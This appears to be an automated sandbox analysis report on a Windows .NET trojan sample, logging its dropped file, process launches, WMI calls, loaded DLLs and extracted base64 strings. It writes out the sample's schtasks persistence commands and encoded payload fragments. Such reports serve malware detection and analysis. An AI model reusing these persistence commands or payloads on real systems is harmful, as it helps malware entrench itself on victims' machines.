ctirMPudFriZs/d1YKnRZKpdMwiW8R0Fw26BVLiuVZo9zFgHrv23uB66kfpROoPu0dT3jMlQpGYQhUi91VC/rEpIea42srGpZ2hyjKMW7LpFvKDPcF3R0JnNchAkF8VuLP6t0+frDhI2vAA0+zIqZz63CmQMmpbg5Amg+JdTmQj5+8l/J+ahHffrpTYlmHbTPRkRfaCylgLOG7oyq7y6aQMDL0jl/q/PndBJccUCNRJEtzHYv60Q8BPnZTPbPCCAS9hqPn5mpYKgZHo9maRBg+tjhZBvyQNvNfilPgsTekdPLmFN5qovqYX6s/EBU4S6k7zmXI4cn91RR+a4K6DWWXMKs8CnuwQeTF87KjXabk1DdO9oCmfsKASNgHR9bmZ/h3uCBz51SjKqkLprDGdp2Sx633lbayQopmpA4oRx6Um4PIhaILge6a+9R2MFNY8W8RRS1li2QppK26kaeO3Xs8PaOLD2vgOyyw1D0sKW4KlFLGkqkmWqX9FJd9lYmQcAqqUhaVj/YuCMnMtofECaKMic/6PCtDk0EnQlFziP6PoNO8b89heFnha/Etao0IegEDJYcFCxQxImfG2OgBwRouKgm8b2JwR9PcamcRdxO7KTmhK2ibwd72oBcqJbrnZiIS0fDY6AbLCl4pVRvAXZho1UJ5Kf2vJLqqy2HBpzLDjIsH7dMW0DOp5Uxm9b8tJ008y4ujoo71MIpbVjJ9Rp8q6BjLTijqZPD7F4y5jwCPNDJukrbwhxq1arSEk0QFYvbo/51pd08oHYA7E5us3kXdogwuu+CKLiP0aj7WFIjGnrkJB1t9xV7zvDssoGz018n7Z2+9bEqPM96YfgFQZQzdkUZhwTfD0gTE1AuGqSdFtwI++CCWZu2bFcQso5MnC3tr2pjDy5UK7V2WnrGUS2AHHSAZxgIgbQOXhFtM/YGJH2v13C/suH4hDPJ2d6xB0/qjkjud39q85pke0kGq+mCFRfLKsc0ruHZmOJ1Xklxhyrg6zkSivdUKz7z8HnCy31sfLPg03awiooA+0on5/MIaw0wm/JVj6WfdrSjkJvEZwTdarksWZPPLjdIydPSpEBm7MkIRWkfmtLj3/LJFzhHARroO5kFg0yIvvLQfoTwA1EeFhCJ9lXDyq4QPBVVXN826ot4FV+m/kry2g8otRrHgLVRn45oxtLLBfy
                Source: ArELGBzuuF.exe, 8B6.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                Source: ArELGBzuuF.exe, 76n.csBase64 encoded string: 'njIJFeQcOj/VJMCtIaY+JeCiVFWPURQ7CWby2A4sQy9DSYHlRpwqjQnYm/zD+cRfH5IE+1ZqVcZKCUcpCe+sYh5dl/3rz5wAVm0oNGacMdfRTHy/xSLIAvPcp6sE/ns1lZ5GBsU5FW84JKETCtYTG/KxSbWDtttAowK1UhPunifbQUZApWGVWz3psZynbBMklqAOeO+Ze/cwIvrD+k9gORh4byemU+NFey6zcq8/FZGjIZXa8qhJIiPBQ+b6zU4X'
                Source: ArELGBzuuF.exe, 7YK.csBase64 encoded string: 'T7TY6cxeaP5Ng766KwibPhSlwDPbTHesNVHWiYH7bA4s5oLjpWhoHsOm6g2LSrXWyMXvYmoFWsEvHxJ+fbsuQs/+q00slz8HqoA2tTbDwe08J5dBqbskLzqSn6u23yMw1sp+fLFNQJRK+1d8lLZ63Fl9uvTU+85fU8p2kPG3xTYII9SuxfCkA+vCsRWqBm7whSc4/IgaabvAs4xVcnt2jmBShi7h6zgpunnpddRpuWcXKO94h8fpkM1vf5VPU3ICITY1OiG9zZ/XQgATvSfcPqq5tE+1gzfwN/2NUPb41a+J5rmdPDnbq9tG2XokWSyq4UDgC6R3vo5gfY0VJMicBF8DZrDxOlFtz/+oVqeBsCpoyQ2W9WarkNCh/dsdk2ayBxzGMomfiunGCAdLPkgI+3ZrnVLTdYVOniXbjK1gS5cDDXlI2Q1E+CaYqzLkdsVjPwSrdkHy4SH0XiPJjDzIeG/gmnV2+pqrM/WsTRWRUn8nSQLr9K4+zpNG1zLP1EGM6xTK0UNpLhxx07ifeQLXEVEVJaqf3ivIFjv/7nA8Oyg=', 'YkHENXQkg1njy3v1Ip7gysBPMcVc02YFRsCPim1aHPiZhhr5fUMPdz5qi11vCxtndhSF0fSfxgZiJmrpuZ7fpJlbxWqqvGYTg46AOlE9Brb7aWg6KMAm0N7U61Seymur'
                Source: ArELGBzuuF.exe, 52Z.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                Source: staticfile.exe, 00000015.00000002.2450340903.0000000001398000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
                Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@29/20@0/1
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Program Files (x86)\Microsoft\Edge\Application\CSCFB5D2BE025D440B3B78FE4AD3E8F4E5B.TMPJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile created: C:\Users\user\AppData\Local\staticfile.exeJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeMutant created: NULL
                Source: C:\Users\user\AppData\Local\staticfile.exeMutant created: \Sessions\1\BaseNamedObjects\Local\43916a3ddb7d391681fec34f05a840c5608722484717d73ef9982e5fd0ce4199
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile created: C:\Users\user\AppData\Local\Temp\kdqn3ul3Jump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3tz3CUwFBN.bat"
                Source: ArELGBzuuF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ArELGBzuuF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ArELGBzuuF.exeVirustotal: Detection: 60%
                Source: ArELGBzuuF.exeReversingLabs: Detection: 78%
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile read: C:\Users\user\Desktop\ArELGBzuuF.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\ArELGBzuuF.exe "C:\Users\user\Desktop\ArELGBzuuF.exe"
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "staticfiles" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\staticfile.exe'" /f
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "staticfile" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\staticfile.exe'" /rl HIGHEST /f
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "staticfiles" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Local\staticfile.exe'" /rl HIGHEST /f
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB12E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFB5D2BE025D440B3B78FE4AD3E8F4E5B.TMP"
                Source: unknownProcess created: C:\Users\user\AppData\Local\staticfile.exe C:\Users\user\AppData\Local\staticfile.exe
                Source: unknownProcess created: C:\Users\user\AppData\Local\staticfile.exe C:\Users\user\AppData\Local\staticfile.exe
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sxun3xbz\sxun3xbz.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB66E.tmp" "c:\Windows\System32\CSC97DCB281A28F42AF94908E122161F85F.TMP"
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3tz3CUwFBN.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\staticfile.exe "C:\Users\user\AppData\Local\staticfile.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Local\staticfile.exe "C:\Users\user\AppData\Local\staticfile.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Local\staticfile.exe "C:\Users\user\AppData\Local\staticfile.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Local\staticfile.exe "C:\Users\user\AppData\Local\staticfile.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Local\staticfile.exe "C:\Users\user\AppData\Local\staticfile.exe"
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline"Jump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sxun3xbz\sxun3xbz.cmdline"Jump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3tz3CUwFBN.bat" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB12E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFB5D2BE025D440B3B78FE4AD3E8F4E5B.TMP"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB66E.tmp" "c:\Windows\System32\CSC97DCB281A28F42AF94908E122161F85F.TMP"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\staticfile.exe "C:\Users\user\AppData\Local\staticfile.exe" Jump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: dlnashext.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: wpdshext.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: mscoree.dll
